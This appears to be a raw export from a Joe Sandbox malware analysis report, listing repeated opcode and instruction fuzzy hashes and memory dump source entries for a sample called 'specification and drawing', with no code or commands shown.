                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                                                                                          • Instruction ID: 786a6434da520eb743ee60fd84cb29bc53240ccac7eb2219906b8579242301d4
                                                                                                          • Opcode Fuzzy Hash: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                                                                                          • Instruction Fuzzy Hash: 0C31D731A0152C9BDB35DF18CC81FEE77B9EB15740F0101E5E685AB290DBB49E808FA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                          • Instruction ID: 5ed17e5a34a9104b537f0b5c6b27f2edfc346864b8a2ee47b89103cb4a181b30
                                                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                          • Instruction Fuzzy Hash: 25219F32A00609EBCB15CF58C981A8FBBF5FF4C714F148069EE59DB641D671EA058B90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                                                                                          • Instruction ID: 65a9288ee06b520cd82baea4bbed47fd7336ebcaecef6f57db13e654d6fb0eee
                                                                                                          • Opcode Fuzzy Hash: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                                                                                          • Instruction Fuzzy Hash: CB21B1726047499BC722DF58C885B6BB7E4FF88B60F05451DFE949BA42D730E9008BA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                          • Instruction ID: c4134f81ff37fa63eb77521cfda286cecd056bacbad9b920bdf628c39672363a
                                                                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                          • Instruction Fuzzy Hash: 5231AB31600605EFDB25DF68C888FAAB7F9FF45354F1045A9E5928B281E730EE02CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                                                                                          • Instruction ID: 6a5bd998a699d74a4d9625cce87086a8f57b9e610d7f6408371f52bc6df3d463
                                                                                                          • Opcode Fuzzy Hash: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                                                                                          • Instruction Fuzzy Hash: E8317AB5A112069FCB1CCF18C8849AEB7B6EFD4304F154459E80A9B395E771EA50CB91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                          • Instruction ID: bae4649b7e796f1a070c437291e59891f31655b079933403b3ef1c4500edd709
                                                                                                          • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                          • Instruction Fuzzy Hash: 082133317006D19BE72EA72CD814B6E7BF4AF40B50F0940A5EE828B6D2E7789C10CA15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                                                                                          • Instruction ID: 6357023d69b9465d2226bef9cdbd69c90548d5e0a129599e095d3ece1061c615
                                                                                                          • Opcode Fuzzy Hash: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                                                                                          • Instruction Fuzzy Hash: FA21B1719006299BCF19DF59C881AFEB7F4FF48744F400069FA81AB240D778AD41CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                                                                                          • Instruction ID: 43e72a14987dbe21c9ab4bca86946e3742fea3953bfb89ab23dfa17ad3d19a61
                                                                                                          • Opcode Fuzzy Hash: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                                                                                          • Instruction Fuzzy Hash: A4218D71A00645AFD719DB69D840FAAB7A8FF48740F140069FA44DB690D734ED40CB58
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                                                                                          • Instruction ID: 22b7755439e8bee3f4543962b19a9ef49ba949650b79d8fb265d4f0b307e4514
                                                                                                          • Opcode Fuzzy Hash: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                                                                                          • Instruction Fuzzy Hash: 0E21B3B29083469FD715EF5AD844FDBBBDCAF94A44F08045ABE80CB291D734D904C7A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                                                                                          • Instruction ID: d6a64d50d646dd259c3c5ff0214d8092b9d4adf31cf7c53bbdee7fa136a872b5
                                                                                                          • Opcode Fuzzy Hash: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                                                                                          • Instruction Fuzzy Hash: 92213E316457969FE326672DDD08B593BD8EF41B74F2803A0FAA09F6D2D768C8018645
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                                                                                          • Instruction ID: 0c6857260ab4de3d26283863c0b490db24973260ad516e17c248a0bbbcac711a
                                                                                                          • Opcode Fuzzy Hash: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                                                                                          • Instruction Fuzzy Hash: F0219A75200B01EBCB29DF29CD41B8677F5EF48B44F14846CA549CBB61E331E942CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                                                                                          • Instruction ID: 9936a17f7438482dd4e4c623f04d6f7604fe21bdfcc7801aa17b71fdcb44b2aa
                                                                                                          • Opcode Fuzzy Hash: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                                                                                          • Instruction Fuzzy Hash: 5D21E9B1E01209ABCB14DFAAD9909EEFBF9FF98B10F10012EE515A7250D7709941CB54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                          • Instruction ID: 3085576bed3125985f2d21acec13a3689547ad79389268e80ccbca8bdf34bd87
                                                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                          • Instruction Fuzzy Hash: 88218C72A00209EFDF169F99CC80BAEBBB9EF88310F214419F960A7251D734D9509B50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                          • Instruction ID: 5c3695b2a5c3d2ea004d913a34d2337dd362e3d4b15c76ba14c67bd69b442481
                                                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                          • Instruction Fuzzy Hash: F411EF72640605AFE7229B48CC82FDABBB9EB80754F10406DFB448B580D671ED44CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                                                                                          • Instruction ID: d16af9972b8db01f79c5c16950e6b0e8909f7c5d998afbcdfa116b6522d3f7d5
                                                                                                          • Opcode Fuzzy Hash: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                                                                                          • Instruction Fuzzy Hash: AE1193357006119FDB55CF4DC4C0A5EBBE5BF56B10B1881AEEE489F204E6B2D901CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                          • Instruction ID: 5d3f76459771b7126c7d6f0b754804caed7df4157e630e50eb6b10303779ba98
                                                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                          • Instruction Fuzzy Hash: EB21AC71B00609DFD7259F49C541A66BBE6EF94B10F14887DEA898BA1AC730EC00CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                                                                                          • Instruction ID: 332776c5a5bff876155382ae8520d9edc1786fad6aecfc9b291faac8c167c027
                                                                                                          • Opcode Fuzzy Hash: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                                                                                          • Instruction Fuzzy Hash: 5F215E75A00205DFCB14CF58C591AAEBBF9FB88714F2481AED545AB351C771AD06CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                                                                                          • Instruction ID: 45c9a124a172a79779ef25ba2fe51799ca8179a039d86f152b58ad24da4e7d13
                                                                                                          • Opcode Fuzzy Hash: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                                                                                          • Instruction Fuzzy Hash: 7D218E75500B00EFD7249F68C881B6AB7F8FF84350F00882DE69AC7A50DB71A840CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                                                                                          • Instruction ID: b277003eb527fd8e71ce2e4ae4e14c8abac174a8f1e91bcfe8ebb8cf43e6293c
                                                                                                          • Opcode Fuzzy Hash: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                                                                                          • Instruction Fuzzy Hash: 4E11C172240605EFC76ADB69CD40F9A77B8EB59760F414025FA619B260EB70E901C7D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                                                                                          • Instruction ID: 706a4f8324bc0284a93b8c0456cf0aaf71f811b7ef768164ea70cb2f1dd58dd2
                                                                                                          • Opcode Fuzzy Hash: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                                                                                          • Instruction Fuzzy Hash: C61108733001199FCB1DDB29CD85AAF72E7EBE5270F358529D922DB290EA309812C390
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                                                                                          • Instruction ID: c6b3672e157b771a99c54f37a268924193b025ca1831d785a094f923512ccdcc
                                                                                                          • Opcode Fuzzy Hash: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                                                                                          • Instruction Fuzzy Hash: 2011CE76A01305EFCB29CF59C582A5ABBF8AF94610B0140BDDA859B711E630DD00CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                          • Instruction ID: 536bd35d55ea2e4f3548958c5d151273fa15ab7e60f9110232840cf5d4d0dd3d
                                                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                          • Instruction Fuzzy Hash: C7110436A00919AFDB1DDB58C801F9EFBF5EF84214F058269E845A7340E731AD01CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                          • Instruction ID: 6df84fc4e33ed554317f5af5ac85bbba232307b714d7e7f2a23514273934e6d9
                                                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                          • Instruction Fuzzy Hash: 4821C3B5A40B459FD3A0CF29D541B56BBF4FB48B10F10492EE98AC7B50E371E854CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                          • Instruction ID: c380c25f406ff3fae3710d2dc0222f74b7b9dab4f09fd8e3d33ba1cea79c51c6
                                                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                          • Instruction Fuzzy Hash: 8111A032602602EFFF299F58C844B5ABBA5FF85B54F05842CEA499B160DB39DC40DB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: da40de213f15bad453a3f2d23be84764f49e2239ff126f78e3da6971d9de357e
                                                                                                          • Instruction ID: a9e8e7929b209393097eaef28572d8d73b1234e8676d061e533d975864764548
                                                                                                          • Opcode Fuzzy Hash: da40de213f15bad453a3f2d23be84764f49e2239ff126f78e3da6971d9de357e
                                                                                                          • Instruction Fuzzy Hash: 4401DB72606649AFE31A636EED48F6B7BDCEF40754F050075FA418B651D614DC10C6A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b42755982e4efbb130797f6ef31ed6c74e0be866b0dfca563814ebb5066026f
                                                                                                          • Instruction ID: aa153e7104b118ab1bb980effe60e5c92be07d22743880ddf962e9ca747daaec
                                                                                                          • Opcode Fuzzy Hash: 7b42755982e4efbb130797f6ef31ed6c74e0be866b0dfca563814ebb5066026f
                                                                                                          • Instruction Fuzzy Hash: 0411AC36200645AFDB25CF59D9A0B5E7BE8FB9AB64F00425DF998CB250C371E840CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1dd702b136e1fa20eb79569c767e53432991fc5439bcf196633554df2532f81b
                                                                                                          • Instruction ID: 8e2f37dca8e44ff9cf203efcba8776134bde24e96aef8bdcf075688aaf57bda0
                                                                                                          • Opcode Fuzzy Hash: 1dd702b136e1fa20eb79569c767e53432991fc5439bcf196633554df2532f81b
                                                                                                          • Instruction Fuzzy Hash: 6E11C276A00715ABDB21DF59C9C1B9EFBB8EF88B50F500098DA41B7600DB35AD018B50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7dc710f6355497ef8b27769f794e3c9cbb6dc55b0c87cc3bc20e1a4401dab4a8
                                                                                                          • Instruction ID: 8745ff2d08958b83e2e73498417711a2de65b15aac0b2c0c8b6641b726b16de8
                                                                                                          • Opcode Fuzzy Hash: 7dc710f6355497ef8b27769f794e3c9cbb6dc55b0c87cc3bc20e1a4401dab4a8
                                                                                                          • Instruction Fuzzy Hash: 6101D27150010A9FC769DB19D488F5ABBFAEB85314F2882BEE1448B261C770AC82CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                          • Instruction ID: 1f72032131f3849e25e2c8f23c5b2d01e33a2648e033754d4838839f90e3b3e6
                                                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                          • Instruction Fuzzy Hash: 8C11E5722017D79FEB27972DD958B653BE4EB00744F1900E0EE818B682F328C853C655
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                          • Instruction ID: 1297b57d31c4e7ad3f3c25aa129ba7bde549b7a8fce0b4c0392bdc342191e81f
                                                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                          • Instruction Fuzzy Hash: 6701D632602905EFE729DF58CC00F5A7AA9FB84F66F058024EA459B160E779DD41CBD0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                          • Instruction ID: 669b87d06ea0e589b905594a43e3b6851d594ee523141f8cf6123c2851ec232b
                                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                          • Instruction Fuzzy Hash: 7701C471605B21DBDB618F1D9880AAA7BE5EB55770B00856DFDD58B681E731D400CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3a7eaa01f3ef78be0954dd68075ae6b42e7501c978dc67a76643e13dffa9adab
                                                                                                          • Instruction ID: ff1e6322892ca4cdc9dd81c1eb72f49ec5566b2f4c23e0e0ba41cb7a173542a6
                                                                                                          • Opcode Fuzzy Hash: 3a7eaa01f3ef78be0954dd68075ae6b42e7501c978dc67a76643e13dffa9adab
                                                                                                          • Instruction Fuzzy Hash: F1118E31242345EFDB1AEF19C990F5A7BB8FF94B54F100065E9059B661C375ED01CA90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 52294a5c863853a096d5b39639ae5597b937c6e24a004c6e165e5ea19fa4d307
                                                                                                          • Instruction ID: 02c8a91c989fcc2c094d05a2194ecccad30a52576adc7b641a0d54919db675df
                                                                                                          • Opcode Fuzzy Hash: 52294a5c863853a096d5b39639ae5597b937c6e24a004c6e165e5ea19fa4d307
                                                                                                          • Instruction Fuzzy Hash: B8119E7090162CABDB3AEB64CC42FEDB3B4AB08714F5041D4A314A61E0DB709E81CF84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
